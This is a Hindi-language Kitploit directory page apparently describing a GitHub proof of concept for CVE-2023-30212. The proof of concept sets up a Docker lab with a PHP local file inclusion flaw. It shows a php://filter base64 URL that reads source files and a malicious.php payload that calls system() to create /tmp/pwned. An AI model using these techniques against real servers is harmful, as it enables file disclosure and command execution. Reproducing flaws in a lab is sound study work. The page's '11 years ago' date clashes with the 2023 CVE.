Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2023-30212 — Docker का उपयोग करके CVE-2023-30212 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/sungmin20/cve-2023-30212
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsungmin20/cve-2023-30212

cve-2023-30212

Docker का उपयोग करके CVE-2023-30212 के लिए PoC

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2023-30212

Docker का उपयोग करके CVE-2023-30212 के लिए PoC

CVE-2023-30212 पर्यावरण सेटअप और PoC रिपोर्ट

📌 अवलोकन

यह रिपोर्ट Vulhub में उपलब्ध नहीं होने वाली CVE-2023-30212 कमज़ोरी के लिए Docker-आधारित कमज़ोर वेब पर्यावरण को स्वयं स्थापित करने और PoC के माध्यम से उस कमज़ोरी को सिद्ध करने का विवरण प्रस्तुत करती है।

  • CVE नंबर: CVE-2023-30212
  • कमज़ोरी का विवरण: PHP LFI (Local File Inclusion) के माध्यम से रिमोट कोड निष्पादन की संभावना
  • कठिनाई स्तर: उन्नत (Vulhub में उपलब्ध नहीं पर्यावरण की स्थापना)

🔧 पर्यावरण सेटअप

1. Dockerfile और docker-compose सेटअप

  • आधार इमेज: php:8.1-apache
  • /var/www/html निर्देशिका में vulnerable.php और कॉपी करें
---
malicious.php
  • पोर्ट 8088 पर बाहरी पहुँच संभव डॉकर बिल्ड
  • 2. मुख्य फ़ाइलों का विवरण

    फ़ाइल नामविवरण
    vulnerable.phpLFI कमज़ोरी वाली PHP फ़ाइल
    malicious.phpसिस्टम कमांड निष्पादित करने वाली दुर्भावनापूर्ण PHP फ़ाइल
    docker-compose.ymlकंटेनर सेटअप के लिए कॉन्फ़िगरेशन फ़ाइल
    Dockerfileडॉकर इमेज बनाने के लिए कॉन्फ़िगरेशन फ़ाइल
    image
    image
    image
    image

    🚀 कमज़ोरी निष्पादन प्रवाह (PoC)

    1. कंटेनर चलाना

    root@kitploit:~
    docker-compose up -d
    

    कंटेनर का नाम: cve-2023-30212-cve-lfi-1

    Apache सर्वर चालू होता है तथा http://localhost:8088 पर पहुँच संभव है

    1. LFI-आधारित दुर्भावनापूर्ण फ़ाइल स्रोत की पुष्टि नीचे दिए गए URL को कॉल करके malicious.php की सामग्री को base64 एन्कोडेड रूप में जाँचें:
    root@kitploit:~
    http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
    
    base64

    आउटपुट को डिकोड करने पर नीचे दिया गया PHP कोड दिखाई देता है:

    root@kitploit:~
    <?php system("touch /tmp/pwned"); ?>
    
    image
    1. कमांड निष्पादन और परिणाम की पुष्टि नीचे दिए गए URL को कॉल करके वास्तव में कमांड निष्पादित करें:
    root@kitploit:~
    http://localhost:8088/malicious.php
    

    कमांड निष्पादित करने के बाद, /tmp/pwned फ़ाइल बन जानी चाहिए।

    root@kitploit:~
    docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
    

    यदि परिणाम में pwned फ़ाइल मौजूद है, तो सफलता।

    pwned फ़ाइल

    परिणाम सारांश

    php://filter-आधारित LFI कमज़ोरी के माध्यम से दुर्भावनापूर्ण फ़ाइल की सामग्री की पुष्टि और डिकोडिंग सफल रही

    system() फ़ंक्शन युक्त दुर्भावनापूर्ण PHP कॉल के माध्यम से मनमाने कमांड निष्पादित करने में सफलता

    /tmp/pwned फ़ाइल बनने के साथ PoC सत्यापन पूर्ण

    टूल डाउनलोड करें